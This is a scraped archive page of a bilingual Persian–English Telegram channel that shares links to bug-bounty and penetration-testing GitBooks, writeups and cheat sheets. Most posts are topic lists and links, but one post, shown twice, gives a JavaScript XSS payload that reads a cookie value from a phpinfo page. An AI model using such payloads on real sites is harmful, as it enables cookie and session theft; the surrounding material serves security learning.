fa
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

رفتن به کانال در Telegram
7 436
مشترکین
-124 ساعت
+27 روز
+16630 روز
آرشیو پست ها
𝗪𝗵𝗼𝗔𝗺𝗜 𝗪𝗿𝗶𝘁𝗲𝘂𝗽 •Web Cache Poisoning •Came looking for SSRF and found XSS •Phishing Attack using Machine Learning model •JWT Attacks •OAuth - Mechanism and Attacks •Upgrade plan from Free to Paid via Response Manipulation •XSS IN SOQL Console •Journey from Automated Discovery to Manual Exploitation Link 🔗:- https://ibraradi.gitbook.io/write-up/ @GitBook_s

𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗕𝗹𝗼𝗴 •Web Application Findings •Recon automation, tips and tricks •Hack The Box Machines •CTF Challenges •Red Teaming Tips & Tricks •Cloud Security Link 🔗:- https://eslam3kl.gitbook.io/blog/ @GitBook_s

𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿 𝗛𝗮𝗻𝗱𝗯𝗼𝗼𝗸 •Getting Started in InfoSec and Bug Bounties •Presentations •Checklists / Guides •Useful Twitter Threads •List of Vulnerabilities •API Security •Mobile Security •Fuzzing / Wordlists •BugBounty Short Write-ups •Burp Suite Tips and Tricks •HackerOne Reports •Response Manipulation •Client Vs Server Side Vulnerabilities •AWS •Chaining of Bugs •Bug Bounty Automation •Mindmaps •Oneliner Collections •Red Teaming •Blue Teamining •Recon One Liners •Containers •Wordpress •Fuzzing / FuFF •OWASP ZAP •Bug List •Setting up burp collaborator •Admin Panel PwN •Credential Stuffing / Dump / •HaveibeenPwned? •Tools Required •Nuclei Template Link 🔗:- gowthams.gitbook.io/bughunter-handbook @GitBook_s

#SQLInjection @GitBook_s
#SQLInjection @GitBook_s

#ResponseManipulation @GitBook_s
#ResponseManipulation @GitBook_s

برای حمایت از کانال پست آخر رو تو گروه ها بفرستید To support the channel, send the last post to groups.

x=new XMLHttpRequest(); x.open('GET','//host/phpinfo',0); x.send();rx=/COOKIE'.*v">(.*?)
x=new XMLHttpRequest(); x.open('GET','//host/phpinfo',0); x.send();rx=/COOKIE'.*v">(.*?)</; alert(x.responseText.match(rx)[1]); #XSS @GitBook_s

Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.

بچه ها گیت بوک ها چطورین، خوب هستن، خوشتون میاد، در این مورد اگه نظری دارید بنویسید برام دلیل فورواردم اینه که بعضی ها اصلا اول کانال رو نگا نمیکنن

📖 Pentest Book by n3t_hunt3r XSS Filter Evasion and WAF Bypassing Tactics Cloud Pentesting Web App Pentesting Link 🔗:- https://n3t-hunt3r.gitbook.io/ @GitBook_s

Pentest Book Recon Enumeration Exploitation Post Exploitation Mobile Others Link 🔗:- http://six2dez.gitbook.io @GitBook_s

Breaking Bits Vulnerability Discovery CTF Firmware Emulator Exploit Development Link 🔗:- https://breaking-bits.gitbook.io/ @GitBook_s

Pentest Everything 🚩Writeups Everything Resources Link 🔗:- https://viperone.gitbook.io @GitBook_s

+ Application Security Cheat Sheet Android Application CI/CD Cloud Container Framework Linux iOS Application Resources Web Application Link 🔗:- https://0xn3va.gitbook.io/cheat-sheets @GitBook_s

bounty Account Takeover Methodology Application Level DoS Authentication Bypass Broken-Link Hijacking Broken Auth And Session Management CMS CORS CSRF Finding CVEs CheckList Web Page Source Code Review EXIF Geo Data Not Stripped File Upload Bypass Find Origin IP GraphQL HTTP Desync Attack Host-Header Attack HTML-Injection IDOR JWT ATTACK MFA Bypass Misconfigurations OAuth Open Redirection Parameter Pollution Password Reset Functionality Rate Limit Recon SQLi SSRF SSTI Sign Up Functionality Sensitive Info Leaks Status Code Bypass Subdomain Takeover Tabnabbing WAF Bypasses Weak Password Policy XSS XXE Link 🔗:- https://mjn.gitbook.io @GitBook_s

OSCP Notes Port Scanning Services Enumeration Web / HTTP password attacks Exploitaion shell Linux Post Exploitation windows post exploitation file transfer cheatsheets Link 🔗:- https://gabb4r.gitbook.io/oscp-notes/ @GitBook_s

Cross-Site WebSocket Hijacking Exploitation in 2025 - Include Security Research Blog https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/